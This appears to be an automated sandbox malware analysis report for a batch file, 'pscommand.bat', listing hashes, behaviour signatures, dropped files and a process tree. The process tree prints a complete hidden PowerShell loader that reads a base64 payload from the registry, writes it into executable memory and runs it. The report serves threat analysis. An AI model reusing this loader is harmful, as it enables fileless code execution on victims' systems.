Analysis

  • max time kernel
    2297s
  • max time network
    1940s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/06/2023, 01:59

General

  • Target

    pscommand.bat

  • Size

    8KB

  • MD5

    04e2ac379f0fa10dedee9fd920936965

  • SHA1

    cbebe36f59406ad99a0ec00063024d40d3025ee8

  • SHA256

    bc1dc22094ff8b5bd16226aee5281fa8dd68b5b99055b8f4076f36a06a740ccd

  • SHA512

    bd0700a8527c8f7d1931f0d7a9e87755dc888a747bff721cc89c134f6e8902e8e1343831cd87e7fe9f141a376b0201949a2ffcc543cdcf0da83ee83444776d7f

  • SSDEEP

    192:oWzvAAErrCn+7FXZYPDhLhxP3YXCtyT80tBwiUBeNoRDXLoJbSLKMKISkxppzCXF:oWzvyrOnKFXZYPDhLhxVW80tjUBeNQzO

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\pscommand.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand $ V a C s 3 f d E n   =   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ S h e l l " ; $ A 8 9 Q c 2 7 s M 0   =   " { C 9 A 3 3 F 6 B - A 8 6 4 - 5 3 4 5 - B 9 0 F D A E 3 8 8 5 0 D 7 1 1 } " ; f u n c t i o n   L H 3 Y N l 1 2 m { P a r a m ( [ O u t p u t T y p e ( [ T y p e ] ) ] [ P a r a m e t e r (   P o s i t i o n   =   0 ) ] [ T y p e [ ] ] $ o C U k R h 1 v 8   =   ( N e w - O b j e c t   T y p e [ ] ( 0 ) ) , [ P a r a m e t e r (   P o s i t i o n   =   1   ) ] [ T y p e ] $ D r F W I r A y X   =   [ V o i d ] ) $ H Z s T H C   =   [ A p p D o m a i n ] : : C u r r e n t D o m a i n ; $ T 1 o p S 9 L i s 7   =   N e w - O b j e c t   S y s t e m . R e f l e c t i o n . A s s e m b l y N a m e ( ' R e f l e c t e d D e l e g a t e ' ) ; $ r y R 9 t O l   =   $ H Z s T H C . D e f i n e D y n a m i c A s s e m b l y ( $ T 1 o p S 9 L i s 7 ,   [ S y s t e m . R e f l e c t i o n . E m i t . A s s e m b l y B u i l d e r A c c e s s ] : : R u n ) ; $ J A R O e t s r F Z   =   $ r y R 9 t O l . D e f i n e D y n a m i c M o d u l e ( ' I n M e m o r y M o d u l e ' ,   $ f a l s e ) ; $ Z N X M F e I   =   $ J A R O e t s r F Z . D e f i n e T y p e ( ' M y D e l e g a t e T y p e ' ,   ' C l a s s ,   P u b l i c ,   S e a l e d ,   A n s i C l a s s ,   A u t o C l a s s ' ,   [ S y s t e m . M u l t i c a s t D e l e g a t e ] ) ; $ D i s h y v 6 p h R   =   $ Z N X M F e I . D e f i n e C o n s t r u c t o r ( ' R T S p e c i a l N a m e ,   H i d e B y S i g ,   P u b l i c ' ,   [ S y s t e m . R e f l e c t i o n . C a l l i n g C o n v e n t i o n s ] : : S t a n d a r d ,   $ o C U k R h 1 v 8 ) ; $ D i s h y v 6 p h R . S e t I m p l e m e n t a t i o n F l a g s ( ' R u n t i m e ,   M a n a g e d ' ) ; $ s V R p o y L   =   $ Z N X M F e I . D e f i n e M e t h o d ( ' I n v o k e ' ,   ' P u b l i c ,   H i d e B y S i g ,   N e w S l o t ,   V i r t u a l ' ,   $ D r F W I r A y X ,   $ o C U k R h 1 v 8 ) ; $ s V R p o y L . S e t I m p l e m e n t a t i o n F l a g s ( ' R u n t i m e ,   M a n a g e d ' ) ; W r i t e - O u t p u t   $ Z N X M F e I . C r e a t e T y p e ( ) ; } f u n c t i o n   g 2 W l K ( $ H S 1 Z O ,   $ t i i u a i )   { $ I b s F Q 6     =   $ H S 1 Z O [ $ t i i u a i + 0 ]   *   1 6 7 7 7 2 1 6 ; $ I b s F Q 6   + =   $ H S 1 Z O [ $ t i i u a i + 1 ]   *   6 5 5 3 6 ; $ I b s F Q 6   + =   $ H S 1 Z O [ $ t i i u a i + 2 ]   *   2 5 6 ; $ I b s F Q 6   + =   $ H S 1 Z O [ $ t i i u a i + 3 ]   *   1 ; r e t u r n   $ I b s F Q 6 ; } $ L r V 8 D t V v   =   " { 0 } I n t P t r   G e t C u r r e n t P r o c e s s ( ) ; { 0 } I n t P t r   V i r t u a l A l l o c ( I n t P t r   a d d r ,   u i n t   s i z e ,   u i n t   t y p e ,   u i n t   p r o t ) ; { 0 } b o o l   W r i t e P r o c e s s M e m o r y ( I n t P t r   p r o c ,   I n t P t r   a d d r ,   b y t e [ ]   b u f ,   u i n t   s i z e ,   u i n t   w r i t t e n ) ; { 0 } u i n t   S e t E r r o r M o d e ( u i n t   m o d e ) ; "   - f   " [ D l l I m p o r t ( ` " k e r n e l 3 2 . d l l ` " ) ] p u b l i c   s t a t i c   e x t e r n   " ; $ y z 7 b 7   =   A d d - T y p e   - m e m b e r D e f i n i t i o n   $ L r V 8 D t V v   - N a m e   " W i n 3 2 "   - n a m e s p a c e   W i n 3 2 F u n c t i o n s   - p a s s t h r u ; i f   ( ! $ y z 7 b 7 )   { S t o p - P r o c e s s   - F o r c e   $ P I D ; } f u n c t i o n   z v a w m O 9 5 2 ( $ L r V 8 D t V v ,   $ L E 9 S a a F u 7 u ,   $ L E s g F Y Y 1 M d )   { $ A M 5 F w 0 f C u S   =   $ y z 7 b 7 : : G e t C u r r e n t P r o c e s s ( ) ; $ M H U H V   =   $ y z 7 b 7 : : V i r t u a l A l l o c ( 0 , $ L r V 8 D t V v . L e n g t h , 0 x 0 0 0 0 3 0 0 0 , 0 x 4 0 ) ; $ O M d l G R   =   $ y z 7 b 7 : : V i r t u a l A l l o c ( 0 , $ L E s g F Y Y 1 M d . L e n g t h , 0 x 0 0 0 0 3 0 0 0 , 0 x 4 0 ) ; $ y z 7 b 7 : : W r i t e P r o c e s s M e m o r y ( $ A M 5 F w 0 f C u S ,   $ M H U H V ,   $ L r V 8 D t V v ,   $ L r V 8 D t V v . L e n g t h ,   0 )   |   O u t - N u l l ; $ y z 7 b 7 : : W r i t e P r o c e s s M e m o r y ( $ A M 5 F w 0 f C u S ,   $ O M d l G R ,   $ L E s g F Y Y 1 M d ,   $ L E s g F Y Y 1 M d . L e n g t h ,   0 )   |   O u t - N u l l ; $ w a E m k Z R W o F   =   [ I n t P t r ] ( $ M H U H V . T o I n t 6 4 ( ) + $ L E 9 S a a F u 7 u ) ; $ C i T g v e   =   L H 3 Y N l 1 2 m   @ ( [ I n t P t r ] ,   [ I n t P t r ] )   ( [ V o i d ] ) ; $ q z Y R F   =   [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : G e t D e l e g a t e F o r F u n c t i o n P o i n t e r ( $ w a E m k Z R W o F ,   $ C i T g v e ) ; $ y z 7 b 7 : : S e t E r r o r M o d e ( 0 x 8 0 0 6 )   |   O u t - N u l l ; $ q z Y R F . I n v o k e ( $ O M d l G R ,   $ M H U H V ) ; } f u n c t i o n   W 3 F 6 u ( $ s G k h 0 Z b 6 n ,   $ P j F j E S e o )   { $ U W 2 U g V X H   =   g 2 W l K   $ s G k h 0 Z b 6 n   1 ; $ b o l O l   =   5 ; w h i l e   ( $ b o l O l + 8   - l t   $ U W 2 U g V X H )   { $ s Y G 3 e E I Y 5 R   =   $ s G k h 0 Z b 6 n [ $ b o l O l ] ; $ Q H L E H O G   =   g 2 W l K   $ s G k h 0 Z b 6 n   ( $ b o l O l + 1 ) ; $ x B p b y x h k 0   =   g 2 W l K   $ s G k h 0 Z b 6 n   ( $ b o l O l + 5 ) ; $ b o l O l   + =   9 ; i f   ( $ s Y G 3 e E I Y 5 R   - e q   $ P j F j E S e o )   { z v a w m O 9 5 2   $ s G k h 0 Z b 6 n [ $ b o l O l . . ( $ b o l O l + $ Q H L E H O G ) ]   $ x B p b y x h k 0   $ s G k h 0 Z b 6 n ; b r e a k ; }   e l s e   { $ b o l O l   + =   $ Q H L E H O G ; } } } $ M I J K w 2 6 g   =   ( G e t - I t e m P r o p e r t y   - P a t h   " $ V a C s 3 f d E n "   - N a m e   " $ A 8 9 Q c 2 7 s M 0 "   - E r r o r A c t i o n   S i l e n t l y C o n t i n u e ) . $ A 8 9 Q c 2 7 s M 0 ; i f   ( ! $ M I J K w 2 6 g )   { $ M I J K w 2 6 g   =   " " ; f o r   ( $ b o l O l = 0 ;   $ X F 4 v o R = ( G e t - I t e m P r o p e r t y   - P a t h   " $ V a C s 3 f d E n "   - N a m e   " $ A 8 9 Q c 2 7 s M 0 - $ b o l O l "   - E r r o r A c t i o n   S i l e n t l y C o n t i n u e ) . " $ A 8 9 Q c 2 7 s M 0 - $ b o l O l " ;   $ b o l O l + + )   { $ M I J K w 2 6 g   + =   $ X F 4 v o R . T r i m ( ) ; } } $ s G k h 0 Z b 6 n   =   [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ M I J K w 2 6 g ) ; $ s G k h 0 Z b 6 n [ 0 ]   =   0 ; i f   ( [ I n t P t r ] : : S i z e   - e q   8 )   { W 3 F 6 u   $ s G k h 0 Z b 6 n   2 ; }   e l s e   { W 3 F 6 u   $ s G k h 0 Z b 6 n   1 ; } S t o p - P r o c e s s   - F o r c e   $ P I D ; 
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iozfbg2b\iozfbg2b.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4160
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES908D.tmp" "c:\Users\Admin\AppData\Local\Temp\iozfbg2b\CSC9C7E47D9992B4B64BFC5F81C24B08E4.TMP"
          4⤵
            PID:1144

    Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\RES908D.tmp

            Filesize

            1KB

            MD5

            9b1324cfc11b34b6627b2894c48613da

            SHA1

            988fc899c4308f3da8a415fd6a9180703da7a788

            SHA256

            283f32c855bd42706144fef5361750b6c6bf4a3d0084a3897e33274ac440d4b4

            SHA512

            c28e49f0a8afa0e7255e526123815bbd692c467c43585d872d188383491ca64eb6c92f6babb04937c2c4c99d3af23aded201a1cf8e0266f6a9677d19a8396cca

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lrbertn2.ryf.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\iozfbg2b\iozfbg2b.dll

            Filesize

            3KB

            MD5

            b15287cc232ad4cf2fc05cac348186ce

            SHA1

            6836b293ad4db006c8d8cf42d73413b013db324d

            SHA256

            f97325dd8518d0aec36fd56f8356fe09c2300fa6364a96d4a56e93ab308a279c

            SHA512

            5a85f3e5f10022350d806772a69277751466290355aec1247999163aaf4eb4fba9ec73e37bb8e0642637fda0611e50436127f821ff3edbd269f55f673a68b892

          • \??\c:\Users\Admin\AppData\Local\Temp\iozfbg2b\CSC9C7E47D9992B4B64BFC5F81C24B08E4.TMP

            Filesize

            652B

            MD5

            73b0ddc5360129d94fbcaf0e23a711bf

            SHA1

            86ff28f6bed82ab16b3421c522ddb6169222fdcd

            SHA256

            a916bbb4371982521746fc97c50e41a3418acb266d81536c7053b792803e3a5b

            SHA512

            48a8165ab685fed8b070162a331e3ca6e1fce3fbba54688af57b502e5cc2bd6fd493276d6eacb20d1da26dc1cf49f5ea3b0159bac1839e26c82e16bcaee4b78d

          • \??\c:\Users\Admin\AppData\Local\Temp\iozfbg2b\iozfbg2b.0.cs

            Filesize

            528B

            MD5

            294576045a17dc1cbd5d513d68ab3665

            SHA1

            74f3b68beb9eee42c5a644072a9fc7f13d7c63f0

            SHA256

            8e7baa4597002dbd6f160a291852e66d91fe6ce38bdffb8aa1473b57fb97f381

            SHA512

            6b48f1f23c11e42cabfb06e9ef913afa926344f4c08ede7bff50d33ace384b7999f9d7c772252937446c91aa2eac32923375dfe0161b55984538b58655893abe

          • \??\c:\Users\Admin\AppData\Local\Temp\iozfbg2b\iozfbg2b.cmdline

            Filesize

            369B

            MD5

            68d3b329677ec32faa4cb8d78704c87e

            SHA1

            cd90ff3e3c76c92aaf0e2ef0a194186d6d8ec056

            SHA256

            ac3d971ed216cfd8c7f7404379972b2eed8be6d28490778a7fbc9fc36268787c

            SHA512

            3821181e38c606db7d1d32fd8ab63a60790b4e5ebdc8b3dc3fc81c258c16b98cc540e31fbabda6314b2a9af1f44002ca94c78a4a60eb60511e5c0e28cc143c82

          • memory/1636-142-0x0000029856720000-0x0000029856742000-memory.dmp

            Filesize

            136KB

          • memory/1636-143-0x0000029854570000-0x0000029854580000-memory.dmp

            Filesize

            64KB

          • memory/1636-144-0x0000029854570000-0x0000029854580000-memory.dmp

            Filesize

            64KB